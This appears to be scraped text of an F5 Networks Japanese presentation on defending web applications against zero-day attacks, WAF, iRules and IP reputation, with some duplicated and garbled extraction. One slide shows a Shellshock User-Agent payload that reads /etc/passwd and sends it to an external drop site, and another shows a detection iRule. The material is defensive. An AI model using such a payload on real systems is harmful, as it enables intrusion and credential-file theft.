<4D F736F F F696E74202D A B B C982A882AF82E9835B838D A834C A CE8DF42E >

Size: px

Start display at page:

Download "<4D F736F F F696E74202D A B B C982A882AF82E9835B838D A834C A CE8DF42E >"

きみおもてぎ
5 years ago
Views:

1 ゼロデイ攻撃から Web アプリケーションを守る秘訣 F5 Networks, Inc. 1

2 Agenda 1.Web アプリケーションの脅威分析 2.Web アプリケーションを守るためにとるべき対策 3.F5 のソリューションを使って守る法 3 現在では数多くの企業がクラウドサービスを利用していますしかしながらその際のセキュリティ対策についてはオンプレミスと比較するときちんと施されていないというのが実情ではないでしょうか今回は企業がクラウドサービスを利用することで何が変わったのかサービスの認証に際してどんなところに気をつけなければいけないのかそして F5 ネットワークスジャパンはどんな貢献ができるのかなどクラウド時代のセキュリティ対策についてご紹介していきます F5 Networks, Inc. 2

3 Web アプリケーションの脅威分析 F5 Networks, Inc. 3

4 IPA による 2015 年版情報セキュリティ 10 脅威 Web アプリケーションに関連する脅威が上位を占めている 1 位オンラインバンキングやクレジットカード情報の不正利 2 位内部不正による情報漏えい 3 位標的型攻撃による諜報活動 4 位ウェブサービスへの不正ログイン 5 位ウェブサービスからの顧客情報の窃取 6 位ハッカー集団によるサイバーテロ 7 位ウェブサイトの改ざん 8 位インターネット基盤技術の悪 9 位脆弱性公表に伴う攻撃の発 10 位悪意のあるスマートフォンアプリサイバーセキュリティの問題は今後企業経営やビジネスモデルにきく関わってくる全ての企業にとって喫緊の経営課題なのである週間ダイヤモンド 2015/01/10 号 Source: 7 こちらは 2015 年 2 月に IPA が選出した情報セキュリティの脅威トップ 10 です主な脅威のうち Web アプリケーションに関連するもの ( 赤字で示した部分 ) が上位を占めているのがわかりますまた先日発売された週刊ダイヤモンドではサイバーセキュリティの特集が組まれました経済誌である同誌でこういった特集が組まれしかも専門誌と同レベルの内容が掲載されている点は注目に値しますこれはサイバーセキュリティ対策という観点がどの企業にとっても必要であり特別なものではなくなったことを意味しているのでしょう F5 Networks, Inc. 4

サイバー攻撃のターゲットはアプリケーション攻撃者 ( ハッカー集団 ) が狙うのは企業が扱う情報的は銭化すなわちビジネスとしているプロフェッショナル集団による為サイバー攻撃システム情報資産狙うのはアプリが扱う情報 OS への脆弱性攻撃 DDoS 攻撃アプリケーションミドルウェアネットワーク OS 知財顧客情報ビジネスプロセス取引情報

5 サイバー攻撃のターゲットはアプリケーション攻撃者 ( ハッカー集団 ) が狙うのは企業が扱う情報的は銭化すなわちビジネスとしているプロフェッショナル集団による為サイバー攻撃システム情報資産狙うのはアプリが扱う情報 OS への脆弱性攻撃 DDoS 攻撃アプリケーションミドルウェアネットワーク OS 知財顧客情報ビジネスプロセス取引情報 9 攻撃者が主に狙うのは企業が扱っている知財やクレジットカード情報を含む顧客情報取引情報ビジネスプロセスなどの情報資産です攻撃者はこれらの情報を地下マーケットなどで金銭化することをビジネスとしています彼らは組織化されたプロの集団でありその場しのぎの対策ではとうてい攻撃を防ぐことはできません F5 Networks, Inc. 5

Web アプリケーションの脆弱性 Web アプリケーションのは全てインターネットに向いているよって数多くの脅威に常にさらされている状況にあるクロスサイトスクリプティングセッションハイジャッキングパラメータ異常 SQL インジェクションブルートフォース攻撃アカウントの詐称アカウントの詐称パスワードリスト型攻撃 11 Web

6 Web アプリケーションの脆弱性 Web アプリケーションのは全てインターネットに向いているよって数多くの脅威に常にさらされている状況にあるクロスサイトスクリプティングセッションハイジャッキングパラメータ異常 SQL インジェクションブルートフォース攻撃アカウントの詐称アカウントの詐称パスワードリスト型攻撃 11 Web アプリケーションへの入力は全てインターネット経由でアプリケーションに渡されますつまり攻撃者はインターネット経由で攻撃できるため Web アプリケーションは常にさまざまな脅威から狙われている状況にあります具体的な手法としてはクロスサイトスクリプティングや SQL インジェクションなどがありますが最近では ID とパスワードの組み合わせを手当たり次第に試していくパスワードリスト攻撃が目立っています F5 Networks, Inc. 6

7 Web アプリケーションの構造今のトピック :Web アプリケーションをゼロディ攻撃から守るか? アプリブラウザネットワーク Web サーバアプリ DB アプリプレゼンテーションアプリケーションデータ search.php userprofile.php Tomcat JBoss user.db 13 Web アプリケーションをいかにしてゼロデイ攻撃から守るか? についてお話ししますこちらは Web アプリケーションの大まかな構造についての図ですブラウザから見た場合ネットワークを介して Web サーバにアクセスしその裏に Web アプリケーションさらにその奥にはデータベースがあります F5 Networks, Inc. 7

8 15 F5 Networks, Inc. 8

9 Shellshock による攻撃のイメージ Linux の bash の脆弱性を利して遠隔から不正アクセス攻撃が成功すればパスワードファイルを取得することも可能に攻撃者 User-agent: () {:;}; #shellcode Web サーバ /etc/passwd Passwd ファイル GET /search.php?name=acmeʼs&admin=1 HTTP/1.1 passwdファイルを隠しファイルにコピー Host: foo.com r n Connection: keep-alive r n User-Agent: () { :; }; echo shellshock; /bin/sh c cat wget /etc/passwd -post_data=/tmp/.xebm01y > r n <dropsite> r n passwd ファイルを外部に送信 17 話題となった bash(shellshock) の脆弱性では外部から簡単なコマンドを使うことで脆弱性の有無を確認できます脆弱性がある場合にはリモートからコードの実行が可能ですつまりこの脆弱性を悪用すればデータベースから情報を盗むなど何でもできてしまったわけです bash(shellshock) が衝撃的だった点は特別なツールを使うことなく誰でも攻撃できてしまうことでしたしかも攻撃先については Google を使えばいくらでも見つけられたのです F5 Networks, Inc. 9

10 ゼロデイ攻撃とは脆弱性が発されて対策が施されるまでに受ける攻撃開いた窓から脅威をコントロールすることゼロデイ攻撃対策脆弱性発脆弱性公開パッチ提供パッチ適応脆弱性存在期間ゼロディ攻撃が発する期間防御可能脆弱性発前の攻撃コード 0-Day 最初のシンプルな攻撃コード初期の亜種難読化など回避技術を駆使した攻撃コードカスタム化されて進化脆弱性クローズカウンターメジャー ( 対抗策 ) を打つ必要がある = ゼロディ攻撃対策 19 通常 OS やアプリケーションに脆弱性が発見されるとその情報が一般に公開されベンダから修正パッチが配布されますしかし各ユーザーはパッチを適用することで他のシステムに影響が出ないか検証を行う必要があるため実際の適用までにはもう少し時間がかかります一方攻撃者は脆弱性が発見された時点からそれを悪用したシンプルな攻撃コードを作成します脆弱性が公開されるころには初期の亜種が誕生しパッチが提供されるころになると難読化などの回避技術を備えた攻撃コードが出現することがありますつまり脆弱性が発見されてからパッチを適用するまでの間にすでに新しい攻撃手段が生まれているのですこれらを使ってパッチが適用される前の無防備な脆弱性を狙う攻撃はゼロデイ攻撃と呼ばれておりユーザーは何らかのかたちで対抗策をとらなくてはなりません F5 Networks, Inc. 10

11 Web サイトの脆弱性対応修正に要した時間の実態対応までの期化は避けられない 30 以内に修正できたのは 50% SQL インジェクションディレクトリトラバーサルクロスサイトスクリプティングソフトウェア等の脆弱性関連情報の取扱いに関する活動報告レポート [2014 年第 3 四半期 (7 9 )] 21 F5 Networks, Inc. 11

SSL 通信の拡と OpenSSL の脆弱性対策の重要性 SSL 化は年間 30% の拡規模で進み現在第 4 フェーズにっている 2014 年は SSL に関連する脆弱性対策が重要な問題になった 3.5 3 2.5 2 1.5 1 0.

12 SSL 通信の拡と OpenSSL の脆弱性対策の重要性 SSL 化は年間 30% の拡規模で進み現在第 4 フェーズにっている 2014 年は SSL に関連する脆弱性対策が重要な問題になった OpenSSL の脆弱性 Heartbleed に対する攻撃状況脆弱性公開直後から攻撃が増加 Netcraft 社のSSL Surveyを基にF5 Networksで作成縦軸 : SSL 証明書の発件数 ( 単位 :10K) 出典 : 株式会社ラック JSOC INSIGHT vol.5 23 F5 Networks, Inc. 12

13 Web アプリケーションのセキュリティ対策ボトルネックは何か? システムが複雑で解析不可能! Web サーバはめられません! 対応が必要なのかわからない! 対応できる要員がいない! IT 運セキュリティアプリ開発新規サービス優先でセキュリティ対策は後に! 経営課題として全ての企業が取り組む必要がある現状打破の必要性 25 Web アプリケーションのセキュリティ対策にはテストや検証といった作業のほか Web サーバを止められない新規サービスが優先でセキュリティ対策に手が回らないシステムが複雑で解析できない対応できる要員がいないそもそも対応が必要なのかどうかわからないなどさまざまなボトルネックが存在します F5 Networks, Inc. 13

14 Web アプリケーションを守るためにとるべき対策 F5 Networks, Inc. 14

15 Web アプリケーションのセキュリティ対策の課題脅威の存在が可視化されない脆弱性のコントロールができないどこから対策に着したらよいかわからない 29 Web アプリケーションのセキュリティ対策における課題をまとめると 3 点が挙げられます脅威の存在が可視化されない脆弱性のコントロールができないどこから対策に着手したらよいかわからないつまり脅威の実態が見えない Web アプリケーションの脆弱性を把握できない対策を打つにしてもどこから手を付けていいのかわからないということです F5 Networks, Inc. 15

サイバー攻撃によるインシデントとはリスク = 脅威脆弱性情報資産脅威情報資産を脅かす為サイバー攻撃 DDoS 攻撃不正なログイン SQL インジェクションホームページの改竄脆弱性システム上の問題点瑕疵脆弱性のあるソフトウェア OS ミドルウェア RDB アプリケーション設定ミス情報資産様々な知財 ID 情報顧客情報事業をえるシステム

16 サイバー攻撃によるインシデントとはリスク = 脅威脆弱性情報資産脅威情報資産を脅かす為サイバー攻撃 DDoS 攻撃不正なログイン SQL インジェクションホームページの改竄脆弱性システム上の問題点瑕疵脆弱性のあるソフトウェア OS ミドルウェア RDB アプリケーション設定ミス情報資産様々な知財 ID 情報顧客情報事業をえるシステム踏み台になることによる第三者への影響悪剥奪 31 サイバー攻撃によるインシデントのリスクは脅威脆弱性情報資産の 3 つが揃うことで高まっていきますサイバー攻撃などのさまざまな脅威は OS やミドルウェアアプリケーションの脆弱性を突くことで企業の情報資産を剥奪します情報資産にはさまざまな知財 ID 情報や顧客情報事業を支えるシステムのほか端末も含まれており乗っ取られたのち踏み台として悪用されるケースも多々あります F5 Networks, Inc. 16

Web アプリケーションを守ることとはインシデントの回避をうためにコントロールできる状態にすること HTTP リクエストアプリケーションレイヤへ脅威をれない複雑化したアプリケーションの脆弱性の把握最新の脅威対策としての PDCA が実できる Web サーバ CGI/ JavaScript アプリケーションサーバデータベースサーバ情報 33 Web アプリケーションを守るとは

17 Web アプリケーションを守ることとはインシデントの回避をうためにコントロールできる状態にすること HTTP リクエストアプリケーションレイヤへ脅威をれない複雑化したアプリケーションの脆弱性の把握最新の脅威対策としての PDCA が実できる Web サーバ CGI/ JavaScript アプリケーションサーバデータベースサーバ情報 33 Web アプリケーションを守るとはすなわちインシデントを回避するためコントロールできる状態にすることです脅威は脆弱性を悪用するよう細工された HTTP リクエストによって Web サーバアプリケーションサーバデータベースサーバへ侵入し情報へとアクセスしますそれゆえアプリケーションレイヤへ脅威を入れないこと複雑化したアプリケーションの脆弱性の把握最新の脅威対策としての PDCA が実行できることが重要なのです F5 Networks, Inc. 17

フレムワクコアサイバーセキュリティ戦略 PDCA サイクルをまわすための統合的な対策をう必要がある例 : サイバーセキュリティフレームワークをテンプレート重要インフラにおけるサイバーセキュリティからのリスクを低減し管理するためのガイダンス国 NIST( 国標準技術研究所 ) により考案

のホームページからダウンロード可能 https://www.ipa.go.jp/files/000038957.

18 フレムワクコアサイバーセキュリティ戦略 PDCA サイクルをまわすための統合的な対策をう必要がある例 : サイバーセキュリティフレームワークをテンプレート重要インフラにおけるサイバーセキュリティからのリスクを低減し管理するためのガイダンス国 NIST( 国標準技術研究所 ) により考案発布構成内容フレームワークコア :5 つのコア機能インプリメンテーション :4 段階の成熟度プロファイル : 達成要件 ( 現状ゴール ) それぞれの機能に各機能の内容をカテゴリサブカテゴリーと細分化して実装していく成熟度モデルを形成サイバーフレームワークの本語訳は IPA のホームページからダウンロード可能 35 脅威対策の PDCA サイクルを回すためには統合的な対策を行う必要があります米国 NIST(National Institute of Standards and Technology 国立標準技術研究所 ) によるサイバーセキュリティフレームワークをテンプレートとしたもので特定防御検知対応復旧の 5 つのコア機能で構成されておりそれぞれの機能にその内容をカテゴリサブカテゴリと細分化して実装していく成熟度モデルを形成します F5 Networks, Inc. 18

19 F5 のソリューションを使って守る法 F5 Networks, Inc. 19

20 Web アプリケーションを守るための F5 からの具体策 PDCA をまわすための多層防御 SSL の可視化 IP レピュテーションの活 39 F5 では Web アプリケーションを守るための具体策として PDCA をまわすための多層防御 SSL の可視化 IP レピュテーションの活用の 3 つを提案しています F5 Networks, Inc. 20

21 Web アプリケーションを守る多層防御とはお互いの機能を連携して最新の脅威に対抗できる PDCA の運を実現し Web アプリケーションを要塞化する特定防御検知対応復旧を実現多層防御システム Webアプリケーションを守るサーバを守るネットワークを守る FW IPS WAF アプリケーションミドルウェアネットワーク OS データ 41 ファイアウォール IPS WAF はそれぞれネットワークサーバ Web アプリケーションを守るものでそれぞれの目的は大きく異なります例えば Web アプリケーションを守るためには HTTP のペイロードデータ部分を監視する必要がありここは WAF と IPS で守ります多層防御とはこのように複数のセキュリティの機能を連携させることで最新の脅威に対抗できる PDCA の運用を実現することです Web アプリケーションをいわば要塞化することで脅威に対する特定防御検知対応復旧を実現します F5 Networks, Inc. 21

パスワードリスト型攻撃に対する多層防御の効果課題 : 気がついたら社のホームページに不正ログインインシデントが発認証機能の強化を検討したいが即効性のある対応も必要攻撃者不正ログインの第フェーズはパスワードリストをいた量のログイン攻撃多くの場合はログイン失敗 Web サーバパスワードリスト User ID password taro@xxx.

22 パスワードリスト型攻撃に対する多層防御の効果課題 : 気がついたら社のホームページに不正ログインインシデントが発認証機能の強化を検討したいが即効性のある対応も必要攻撃者不正ログインの第フェーズはパスワードリストをいた量のログイン攻撃多くの場合はログイン失敗 Web サーバパスワードリスト User ID password taro@xxx.com password hanako@xxx.com 1234 ichiro@xxx.com ichiro ziro@xxx.com abc 成功した場合不正情報搾取ブルートフォース型のログイン試の早期検知は WAF が実施 43 ここでは 2014 年ごろから頻発しているパスワードリスト型攻撃に対する多層防御の効果をみてみましょうパスワードリスト型攻撃は脆弱な Web サービスなどから入手した ID とパスワードの組み合わせを使って別のサービスにログインしようという手法です同じ ID とパスワードの組み合わせを複数のサービスで使用しているユーザーも多いため他の攻撃よりログインできる確率が高く Web サービス側も不正なログインであるかどうかを判別できませんしかしパスワードリスト型攻撃による不正ログインの多くはリストを用いた数を打てば当たる的なブルートフォース型攻撃となるためログインに失敗することも多く WAF があればこれを早期に検知することが可能となります F5 Networks, Inc. 22

WAF を使ったパスワードリスト型攻撃対策 Cookie によるセッション管理対策で精度のい不正ログイン検知クライアントブラウザ BIG-IP ASM Web アプリケーション認証ページ URI にリクエスト認証失敗回数をカウント BIG-IPはCookieを付与 ( セッション管理 ) レスポンス認証リクエスト 1 回 (URI へ ID/Password

回 (URIへID/PasswordをPOST with Cookie) リクエストをブロック認証失敗ログから相関分析 45 F5 の WAF 製品 BIG-IP ASM ならさらに精度の高い不正ログイン検知が可能になります BIG-IP ASM ではクライアントのブラウザから認証ページの URI にリクエストがあった際 Cookie を付与しますこれにより

23 WAF を使ったパスワードリスト型攻撃対策 Cookie によるセッション管理対策で精度のい不正ログイン検知クライアントブラウザ BIG-IP ASM Web アプリケーション認証ページ URI にリクエスト認証失敗回数をカウント BIG-IPはCookieを付与 ( セッション管理 ) レスポンス認証リクエスト 1 回 (URI へ ID/Password を POST with Cookie) Cookie: 認証失敗回数 1 認証失敗 IP レピュテーション情報ジオロケーション情報認証リクエスト 2 回 (URI へ ID/Password を POST with Cookie) 規定認証失敗回数を超えたリクエストをブロックもしくは別ページで CAPTCHA 認証 Cookie: 認証失敗回数 2 認証リクエストN 回 (URIへID/PasswordをPOST with Cookie) リクエストをブロック認証失敗ログから相関分析 45 F5 の WAF 製品 BIG-IP ASM ならさらに精度の高い不正ログイン検知が可能になります BIG-IP ASM ではクライアントのブラウザから認証ページの URI にリクエストがあった際 Cookie を付与しますこれにより例えログイン試行に使う ID とパスワードの組み合わせが変わっても送信元を特定できるため規定の認証失敗回数を超えた場合に以後のリクエストをブロックしたり別ページで CAPTCHA 認証を要求したりといった対策が実施できますまたログに対して IP レピュテーション情報やジオロケーション情報による相関分析を行うことも可能です F5 Networks, Inc. 23

脆弱性診断ツールと WAF の連携課題 : 脆弱性診断ツールによる脆弱性の発から

アプリケーション開発チームの対応アプリの改修バーチャルパッチで検知防御サーバチームパッチ対応 Web サーバ CGI/

の連携により脆弱性の発見からパッチ対応までに時間がかかるという課題も解決できますまず脆弱性診断ツールで脆弱性を特定したら

24 脆弱性診断ツールと WAF の連携課題 : 脆弱性診断ツールによる脆弱性の発からアプリケーション開発の対応の完了までには時間がかかる WAF 検知防御脆弱性診断ツール特定アプリケーション開発チームの対応アプリの改修バーチャルパッチで検知防御サーバチームパッチ対応 Web サーバ CGI/ JavaScript アプリケーションサーバデータベースサーバ情報パッチ運計画 47 脆弱性診断ツールと WAF の連携により脆弱性の発見からパッチ対応までに時間がかかるという課題も解決できますまず脆弱性診断ツールで脆弱性を特定したら直ちに WAF でバーチャルパッチを適用でいます開発チームによるアプリの改修サーバチームによるパッチ運用が完了するまでの間攻撃を検知防御することができます F5 Networks, Inc. 24

脆弱性に対するポリシーを WAF でコントロール脆弱性診断ツールの結果から対応ポリシーを作るのは簡単なクリック作業のみバーチャルパッチを即座に作成アプリケーション技術無しにわずらわしいポリシー作成数を幅に削減 Import した XML から動的に脆弱性リストが作成されるアクションを選択ステージング ( 検知するが防御しない ) も選択可能影響度や影響範囲によって対策項

25 脆弱性に対するポリシーを WAF でコントロール脆弱性診断ツールの結果から対応ポリシーを作るのは簡単なクリック作業のみバーチャルパッチを即座に作成アプリケーション技術無しにわずらわしいポリシー作成数を幅に削減 Import した XML から動的に脆弱性リストが作成されるアクションを選択ステージング ( 検知するが防御しない ) も選択可能影響度や影響範囲によって対策項を選択する 49 WAF の運用においては脆弱性に対するポリシーを作成する必要がありますがこれは工数のかかる専門的な作業ですしかし BIG-IP ASM なら脆弱性診断ツールの結果から簡単なクリック作業のみでバーチャルパッチを即座に作成できるため工数を大幅に削減できます脆弱性診断ツールで検出した脆弱性は一覧で表示され影響度や影響範囲によって対策を選択したり脆弱性ごとにアクションを指定したりできます F5 Networks, Inc. 25

26 BIG-IP の irules によるトラフィックのコントロール課題 : 脆弱性が公開されても影響があるかどうかわからないシステムをめずに早期のカウンターメジャー ( 対抗策 ) がとれないか? 攻撃者 1 User-agent: () {:;}; #shellcode Webサーバ 2 iruleの処理 () {? Shellshockの例 WebサーバはLinuxなので最悪リモートコマンド実につながる脆弱性 CGIでbashを使っているかどうか判別に時間がかかる irulesを使って検知防御セッション RESET 3 51 脆弱性が公開されたが影響があるかどうかわからないのでシステムを止めずに早期の対抗策がとりたいニーズについては BIG-IP ASM の irules によるトラフィックのコントロールが有効です F5 Networks, Inc. 26

27 irules による Shellshock 対策の例スクリプトによる迅速で柔軟なサイバーセキュリティ対策脆弱性に対する攻撃をいち早く検知防御対応することが可能脆弱性 (CVE ) 公開の翌に F5 DevCentral にて提供 when HTTP_REQUEST { Shellshock 対策のiRule 例 ( 部分 ) set pattern "*() {*"; foreach header_name [ names] { foreach header_value [ values $header_name] { if { [string match $pattern $header_value] } { log local0. "Detected CVE attack from '[IP::client_addr]' in HTTP Header $header_name = '$header_value'; URI = '[ reject; リクエストを防御 break; HTTP ヘッダ値に shellshock の攻撃パターン ( {} ( ; ) を検知 53 BIG-IP ASM の irules によるトラフィックのコントロールはスクリプトによって攻撃の検知防御対応を行うもので前述の脆弱性 Shellshock が公開されたときはその翌日に対応 irules を F5 DevCentral にて提供しました F5 Networks, Inc. 27

セキュリティ対策をより効果的にするために SSL の可視化が必要 55 昨今アプリケーションデリバリーの SSL 化が進むことで途中のセキュリティデバイスが検知防御できない

28 SSL 化が進むアプリケーションデリバリーにおける課題と解決策課題 : SSL により途中のセキュリティデバイスが検知防御できない IPS などで SSL の復号再暗号化処理をうと負荷が増して本来のセキュリティ処理に影響するユーザ DDoS 対策 FW IPS WAF サーバロードバランサ Web サーバインターネット SSL セキュリティ対策をより効果的にするために SSL の可視化が必要 55 昨今アプリケーションデリバリーの SSL 化が進むことで途中のセキュリティデバイスが検知防御できないあるいは IPS などで SSL の復号再暗号化処理を行うと負荷が増して本来のセキュリティ処理に影響するといった課題が出てきましたそこで SSL の可視化が必要となっているのです F5 Networks, Inc. 28

29 BIG-IP を使った速 SSL 処理と IPS のインテリジェンスを活する次世代 IPS 検知モード (IDSモード) でも防御を実装 IPSのSSL 処理の負荷を軽減 3 防御 IPブラックリストにより攻撃を遮断 BIG-IP アプリケーション SSL 非 SSL WebAPI SSL App 1 App 2 Database 1 検知 FirePOWER (IPS) で検知 CISCO FirePOWER IPS CISCO ForeSIGHT Management 2 対応 ForeSIGHT で IP ブラックリストを成 BIG-IP にリストを API で動更新 57 そこで IPS である Cisco FirePOWER により検知を実施 Cisco ForeSIGHT Management で IP ブラックリストを生成 BIG-IP ASM のリストを API で自動更新しますこれにより SSL 通信であっても攻撃を迅速に遮断することが可能になります F5 Networks, Inc. 29

30 IP レピュテーションの活課題 : サイバー攻撃は既存のセキュリティ製品の設定を回避して侵する乗っ取られたアカウントを使った不正ログイン Web サーバへの探索為踏み台やボットネットからの攻撃といった活動拠点からのアクセスを特定し検知防御するために IP レピュテーション (IP ブラックリスト ) を活するさらにジオロケーション (IP アドレスの地域情報 ) も参考にアクセス傾向を分析 59 F5 Networks, Inc. 30

31 IP レピュテーションと Geo ロケーションを活した脅威対策ファイアウォールや WAF のポリシーを補完パスワードリスト型攻撃にも有効 IP Intelligence Service 情報システム系 PC サーバーポートスキャン 61 サイバー攻撃は既存のセキュリティ製品の設定を回避して侵入してくるという課題がありますが BIG- IP ASM では踏み台端末やボットネットからの攻撃といった活動拠点元からのアクセスを特定し IP レピュテーション (IP ブラックリスト ) を活用して検知防御を行いますさらにジオロケーション (IP アドレスの地域情報 ) も参考にアクセス傾向を分析しファイアウォールや WAF のポリシーを補完しますこれはパスワードリスト型攻撃にも有効な対策です F5 Networks, Inc. 31

32 まとめ Web アプリケーションをゼロディ攻撃から守るためには脅威と脆弱性に対する特定防御検知対応復旧プロセスを実装することが切連携できる多層防御を導してPDCAを実現 SSLを可視化してセキュリティ対策を強化する IPレピュテーションを活して脅威をリアルタイムに検知防御する F5 はアプリケーションデリバリコントローラ市場のリーダとして可性と安全性を両させるセキュリティ対策ソリューションを提供いたします 63 F5 Networks, Inc. 32

33 お問い合わせ窓について社の課題が解決できるのか知りたい積りがほしい相談に乗ってくれる販売パートナーを紹介してほしいなどお気軽に下記の Web フォームよりお問合せ下さい! F5 First Contact( お問い合わせフォーム ) 65 F5 Networks, Inc. 33

34 F5 Networks, Inc. 34

PowerPoint Presentation

PowerPoint Presentation WAF によるセキュリティ対策の勘所 F5 ネットワークスジャパン株式会社プリセールスコンサルタント楠木健なぜ WAF は難しいのか? たくさんのログが出力され精査できない個々のログが正しい検知なのか誤った検知なのか判断できないアプリケーションの変更に対して WAF のチューニングが追いつかない F5 Networks, Inc 2 原因シグネチャ検知だけに頼った運用をしているため汎用化が難しく